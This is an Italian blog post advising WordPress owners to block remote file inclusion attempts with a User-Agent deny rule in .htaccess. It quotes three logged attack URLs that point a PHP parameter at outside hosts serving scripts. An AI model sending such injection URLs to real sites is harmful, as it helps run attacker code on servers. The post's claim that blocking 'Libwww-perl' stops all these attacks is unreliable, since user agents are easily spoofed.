Se utilizzate qualche script o servizio che sia, per controllare le statistiche del vostro sito, probabilmente avrete notato come ultimamente è sempre più facile trovare tra gli indirizzi di percorrenza dei visitatori, tentativi di accesso a link del genere:

• /wp-pass.php?_wp_http_referer=http://www.freedom.com.pl/backup/cmd?
• /wp-pass.php?_wp_http_referer=http://agatsuma.bestfreewebspace.net/safe3?
• /wp-pass.php?_wp_http_referer=http://scumbag.blink-182.de/pics/pics/id.txt?

Un semplice modo per evitare che questi attacchi vadano a buon fine, è quello di inserire alcune righe all’interno del file .htaccess del vostro blog alcune righe, in modo da impedire l’accesso ai robot che si identificano tramite User-Agent “^Libwww-perl”. Il 100% di questi attacchi infatti, viene effettuato da robot identificati in questo modo. Le righe da inserire alla fine del vostreo file .htaccess sono le seguenti:

SetEnvIfNoCase User-Agent “^Libwww-perl” bad_bot
<Limit GET POST>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>

Cosi facendo, vedrete che le vostre statistiche di accesso, torneranno pulite come un tempo.
Utilizzando questo codice, ho anche notato che i commenti di spam bloccati da Akismet sono completamente spariti, mentre prima, ne ricevevo almeno 30 al giorno. Incuriosito da questa cosa, ho provato ad eliminare le righe dal file .htaccess, ed il giorno dopo ho ricevuto 12 commenti di spam, regolarmente bloccati da akismet.

Non so se sia stata una coincidenza, o magari i commenti vengono generati automaticamente da robot identificati allo stesso modo di quelli che provano il PHP Injection sul vostro blog oppure no, fatto stà che ora risulta tutto più “pulito e sicuro”.

Nel caso qualcuno facesse questo tentativo, vi pregherei di rendermi partecipe dei risultati ottenuti. Grazie.

Fonte